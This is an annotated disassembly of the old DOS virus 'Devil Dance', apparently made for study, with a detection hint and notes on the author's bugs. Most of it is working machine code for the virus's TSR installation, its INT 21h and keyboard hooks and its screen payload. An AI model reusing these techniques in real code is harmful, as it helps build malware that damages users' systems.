?? devil.asm
; virus Devil Dance
;
; disassembled by Marek A. Filipiak October 31, 1990
;
; Listing format: offset, opcode bytes, Intel-syntax mnemonic, comment.
; 16-bit real-mode DOS code; the host program's entry point is at 0100h.
; Host program entry: the original first 3 bytes have been overwritten with a
; near jump into the virus body appended after the host (E9 + rel16:
; 0103h + 0B09h = 0C0Ch). The saved original bytes live at virus base + 03A7h
; and are put back by the code at 0C14-0C20.
0100 E9090B JMP 0C0C ; jump into the appended virus body
; ...
; victim code
; ...
;========================================
; Virus entry point
;========================================
; find offset of virus code in memory
; Virus entry point (0C0C): compute own base offset, restore the host's
; first 3 bytes, infect/install if the resident part is not yet active,
; then transfer to the host as if nothing happened.
; Assumes .COM entry state: CS = DS = ES = PSP segment.
; Register use: SI = virus base offset (0C0Ch in this host).
0C0C 8B360101 MOV SI,[0101] ; rel16 displacement of the JMP at 0100
0C10 81C60301 ADD SI,0103 ; + address following the 3-byte JMP = virus base
; restore victim starting code
0C14 56 PUSH SI ; keep virus base across the copy
0C15 B90300 MOV CX,0003 ; restore original first 3 bytes
0C18 81C6A703 ADD SI,03A7 ; saved original bytes at virus base + 03A7h
0C1C BF0001 MOV DI,0100 ; destination: host entry point (ES:0100)
0C1F F3 REPZ
0C20 A4 MOVSB ; copy DS:SI -> ES:DI (direction flag assumed clear)
0C21 5E POP SI ; restore virus base address
0C22 E81300 CALL 0C38 ; check presence of resident part (CF=0 -> present)
0C25 7306 JAE 0C2D ; already resident: skip infection and go to host
0C27 E86503 CALL 0F8F ; infect one file in current directory (not in this listing)
0C2A E82A00 CALL 0C57 ; install resident part
; return to application: push 0100h and RET so the host starts normally
0C2D B80001 MOV AX,0100 ; return address
0C30 50 PUSH AX
0C31 8CC8 MOV AX,CS
0C33 8ED8 MOV DS,AX ; DS = ES = CS again, as the host expects
0C35 8EC0 MOV ES,AX
0C37 C3 RET ; jump to host entry at 0100h
;---------------------------
; is resident part active?
; Residency check: reads the current INT 21h vector (ES:BX) and tests the
; 3 bytes just before the handler entry for the marker 'D','r','k'.
; Out: CF=0 -> resident part found (caller at 0C25 then skips installation),
;      CF=1 -> not found. ES preserved; AX, BX and flags clobbered.
; NOTE(review): only 'D' and 'r' decide the result -- the third CMP sets ZF
; only and CF is cleared regardless, so 'k' is effectively unchecked.
; Detection hint: the "Drk" marker immediately before the INT 21h entry is
; an in-memory indicator for this resident part.
0C38 06 PUSH ES
0C39 B82135 MOV AX,3521 ; get INT 21h vector -> ES:BX
0C3C CD21 INT 21
0C3E 26 ES:
0C3F 807FFD44 CMP BYTE PTR [BX-03],44 ; 'D'
0C43 750F JNZ 0C54 ; no, exit with carry and NZ
0C45 26 ES:
0C46 807FFE72 CMP BYTE PTR [BX-02],72 ; 'r'
0C4A 7508 JNZ 0C54 ; no, exit with carry and NZ
0C4C 26 ES:
0C4D 807FFF6B CMP BYTE PTR [BX-01],6B ; 'k' (result only in ZF, never tested)
0C51 07 POP ES
0C52 F8 CLC ; exit with no carry; Z or NZ depending on the 'k' compare
0C53 C3 RET
0C54 07 POP ES
0C55 F9 STC ; not resident
0C56 C3 RET
;----------------------
; install resident part
; Installer, called from 0C2A with SI = virus base offset.
; Grows the host's memory block, allocates a 1216-byte block, copies the
; virus there (code at 0103h, 0000h-0102h used as work area), detaches the
; block from the host PSP through its MCB, and hooks INT 21h and INT 09h.
; Work-area layout written here: [0000] = virus base (0103h),
; [0002]/[0004] = saved INT 21h vector, [0006]/[0008] = saved INT 09h vector,
; [0015] = payload flag, [0020] = keystroke counter.
; Clobbers: AX, BX, CX, DX, DI, ES, flags. SI and DS are preserved.
0C57 B8004A MOV AX,4A00 ; INT 21h/4Ah: resize memory block at ES (assumed = host PSP)
0C5A BB0010 MOV BX,1000 ; to 64 KB (1000h paragraphs); result not checked
0C5D 0E PUSH CS
0C5E 1F POP DS ; DS = CS
0C5F CD21 INT 21
0C61 B80048 MOV AX,4800 ; INT 21h/48h: allocate memory
0C64 BB4C00 MOV BX,004C ; requested size 4Ch paragraphs (1216 bytes)
0C67 CD21 INT 21 ; NOTE(review): CF is not tested; on failure AX holds an error code, not a segment
0C69 FC CLD ; forward copy
0C6A 8EC0 MOV ES,AX ; ES = segment of allocated block
0C6C 56 PUSH SI ; keep virus base across the copy
0C6D 8BDE MOV BX,SI ; BX = virus base (not used by the copy below)
0C6F BF0301 MOV DI,0103 ; destination offset, mirroring a .COM image layout
0C72 B9AD03 MOV CX,03AD ; virus size (941 bytes)
0C75 F3 REPZ
0C76 A4 MOVSB ; copy DS:SI -> ES:DI
; first 103h bytes of the allocated block serve as the virus working area
0C77 26 ES:
0C78 C70600000301 MOV WORD PTR [0000],0103 ; virus base in the moved copy
0C7E 5E POP SI ; restore SI (virus base)
0C7F 1E PUSH DS ; store current DS
0C80 06 PUSH ES ; store virus ES
0C81 8CC0 MOV AX,ES
0C83 48 DEC AX ; segment of the block's MCB (16-byte header just below it)
0C84 8EC0 MOV ES,AX
0C86 26 ES:
0C87 C70601000600 MOV WORD PTR [0001],0006 ; MCB owner field := 0006; presumably so the block no longer belongs to the host PSP and survives its termination -- verify
0C8D 07 POP ES ; restore virus ES
0C8E 8CC0 MOV AX,ES ; set DS to new virus segment
0C90 8ED8 MOV DS,AX
0C92 B82135 MOV AX,3521 ; get INT 21h vector -> ES:BX
0C95 CD21 INT 21
0C97 891E0200 MOV [0002],BX ; save original INT 21h
0C9B 8C060400 MOV [0004],ES
0C9F BA9B03 MOV DX,039B ; offset of new INT 21h handler in DS (0EA4h in the carrier)
0CA2 B82125 MOV AX,2521 ; set INT 21h = DS:DX
0CA5 CD21 INT 21
0CA7 B80935 MOV AX,3509 ; get INT 09h vector
0CAA CD21 INT 21
0CAC 891E0600 MOV [0006],BX ; save original INT 09h
0CB0 8C060800 MOV [0008],ES
0CB4 C70620000000 MOV WORD PTR [0020],0000 ; reset keystroke counter
0CBA C606150000 MOV BYTE PTR [0015],00 ; reset payload flag (set at 0D02 once the counter reaches 10)
0CBF B80925 MOV AX,2509 ; set INT 09h (keyboard) = DS:DX
0CC2 BAC001 MOV DX,01C0 ; offset of new handler in DS (0CC9h in the carrier)
0CC5 CD21 INT 21
0CC7 1F POP DS ; restore carrier DS
0CC8 C3 RET
;-----------------------------
; INT 09h handler (keyboard)
; Installed at 0CBF; the original INT 09h vector is kept at CS:[0006].
; Work-area variables (CS-relative): [0015] = payload flag, [0020] = keystroke
; counter, [032B] = pointer into a 6-byte attribute table at 0325h..032Ah.
; Behaviour: every INT 09h bumps the counter. Once it reaches 10 the flag is
; set, and from then on every keyboard interrupt rewrites the attribute byte
; under the cursor (no reset of flag or counter is visible in this listing).
; If the Alt bit of the BIOS shift-status byte is set, control goes to 0D60.
; Clobbers: none visible to the interrupted code (all used registers are
; saved and restored before chaining to the original handler).
0CC9 CC INT 3 ; ?? first byte is a CCh breakpoint, presumably left by a debugger; original opcode unknown ??
0CCA FB STI
0CCB 50 PUSH AX ; store AX
0CCC 1E PUSH DS ; and DS
0CCD 33C0 XOR AX,AX ; set DS to 0 (BIOS data area)
0CCF 8ED8 MOV DS,AX
0CD1 A01704 MOV AL,[0417] ; BIOS shift status byte (0040:0017)
0CD4 2408 AND AL,08 ; isolate the Alt bit
0CD6 3C08 CMP AL,08 ; is Alt held?
0CD8 7503 JNZ 0CDD ; not pressed: count the keystroke
0CDA E98300 JMP 0D60 ; Alt held: check for Del key
0CDD 2E CS:
0CDE FF062000 INC WORD PTR [0020] ; keystroke counter (one per INT 09h)
0CE2 2E CS:
0CE3 803E150001 CMP BYTE PTR [0015],01 ; payload flag already set?
0CE8 740B JZ 0CF5 ; yes, always paint
0CEA 2E CS:
0CEB 833E20000A CMP WORD PTR [0020],+0A ; exactly 10 keys were pressed?
0CF0 7403 JZ 0CF5 ; yes
; exit
0CF2 EB64 JMP 0D58 ; exit to true INT 9
0CF4 90 NOP
; exactly ten keys have been pressed or flag [0015] has been set:
; change the attribute at the current cursor position
0CF5 52 PUSH DX ; DX is clobbered by MUL below
0CF6 56 PUSH SI
0CF7 53 PUSH BX
0CF8 06 PUSH ES
0CF9 51 PUSH CX
0CFA BE0301 MOV SI,0103 ; virus base
0CFD 81C62202 ADD SI,0222 ; encrypted part of code (here 0E2Eh); NOTE(review): SI is not read again before the POP at 0D56
0D01 2E CS:
0D02 C606150001 MOV BYTE PTR [0015],01 ; set flag: paint on every keystroke from now on
0D07 2E CS:
0D08 8B1E2B03 MOV BX,[032B] ; BX = current attribute-table pointer (variable at 0E34h in the carrier)
0D0C 2E CS:
0D0D FF062B03 INC WORD PTR [032B] ; advance pointer for next time
0D11 81FB2B03 CMP BX,032B ; past the end of the table (0325h..032Ah)?
0D15 7302 JAE 0D19 ; yes, wrap to the start
0D17 EB0A JMP 0D23
0D19 2E CS:
0D1A C7062B032503 MOV WORD PTR [032B],0325 ; reset pointer to table start
0D20 BB2503 MOV BX,0325 ; use the first entry now
0D23 CD11 INT 11 ; equipment list -> AX
0D25 2430 AND AL,30 ; video mode bits; NOTE(review): AH keeps the upper equipment bits, so the compare below can fail even on a mono adapter
0D27 3D3000 CMP AX,0030 ; monochrome?
0D2A 7505 JNZ 0D31 ; no
; mistake!
0D2C B800B8 MOV AX,B800 ; should be B000 (mono text RAM); both branches end up with B800h
0D2F EB03 JMP 0D34
0D31 B800B8 MOV AX,B800 ; segment of color text video RAM
0D34 8EC0 MOV ES,AX ; ES = video RAM segment
0D36 2E CS:
0D37 8A07 MOV AL,[BX] ; attribute value from the table, between 09 .. 0E
0D39 50 PUSH AX
; find screen address of current cursor position (DS = 0 here)
0D3A A15004 MOV AX,[0450] ; BIOS cursor position, page 0: AL = column, AH = row
0D3D 86E0 XCHG AL,AH ; now AL = row, AH = column
0D3F 8ADC MOV BL,AH ; column (the earlier "row" comment here was wrong)
0D41 32E4 XOR AH,AH ; AX := row
0D43 32FF XOR BH,BH ; BX := column
0D45 B9A000 MOV CX,00A0 ; 160 = 80 columns * 2 bytes per cell
0D48 F7E1 MUL CX ; DX:AX = row * 160 (DX becomes 0, product fits 16 bits)
0D4A D1E3 SHL BX,1 ; column * 2
0D4C 03D8 ADD BX,AX ; BX = offset of the character cell
0D4E 43 INC BX ; attribute byte follows the character byte
0D4F 58 POP AX ; restore chosen attribute
0D50 26 ES:
0D51 8807 MOV [BX],AL ; write it to the screen
; exit
0D53 59 POP CX
0D54 07 POP ES
0D55 5B POP BX
0D56 5E POP SI
0D57 5A POP DX
0D58 1F POP DS
0D59 58 POP AX
0D5A FA CLI
0D5B 2E CS:
0D5C FF2E0600 JMP FAR [0006] ; chain to the original INT 09h handler
; Alt key is pressed
; Entered from 0CDA with AX and DS pushed and DS = 0. Reads the scan code
; directly from the keyboard port; anything but Del chains to the original
; handler, Alt+Del falls into the payload below.
0D60 E460 IN AL,60 ; read keyboard scan code (port 60h)
0D62 3C53 CMP AL,53 ; 53h = Del make code?
0D64 7407 JZ 0D6D ; yes, proceed
; exit to true INT 9
; NOTE(review): unlike the exit at 0D5A, this path does not CLI before
; chaining; interrupts were enabled by the STI at 0CCA.
0D66 1F POP DS
0D67 58 POP AX
0D68 2E CS:
0D69 FF2E0600 JMP FAR [0006] ; chain to the original INT 09h handler
; Alt + Del service (payload; the routine continues past the end of this listing)
0D6D CD11 INT 11 ; equipment list -> AX
; again a mistake: the author wrote decimal 48, which is 30h in hex
0D6F 254800 AND AX,0048 ; masks bits 40h and 08h instead of the video bits 30h
0D72 3D4800 CMP AX,0048 ; both bits set?
0D75 7505 JNZ 0D7C
; in hex, 0048 means a system with 2 diskette drives (bit 40h); bit 08h is reserved
; (on PC, XT and Jr it and bit 04h reflect the size of RAM on the system board in 16 K units)
; so AX AND 48h will probably almost always equal 48h.
0D77 B800B0 MOV AX,B000 ; monochrome
0D7A EB03 JMP 0D7F
0D7C B800B8 MOV AX,B800 ; other
0D7F 8EC0 MOV ES,AX ; ES = video segment
0D81 8CC8 MOV AX,CS ; restore DS
0D83 8ED8 MOV DS,AX
0D85 33FF XOR DI,DI ; ES:DI = start of video RAM
0D87 B407 MOV AH,07 ; attribute (presumably for a screen fill; the loop is beyond this listing)
0D89 B0B1 MOV AL,B1 ; character B1h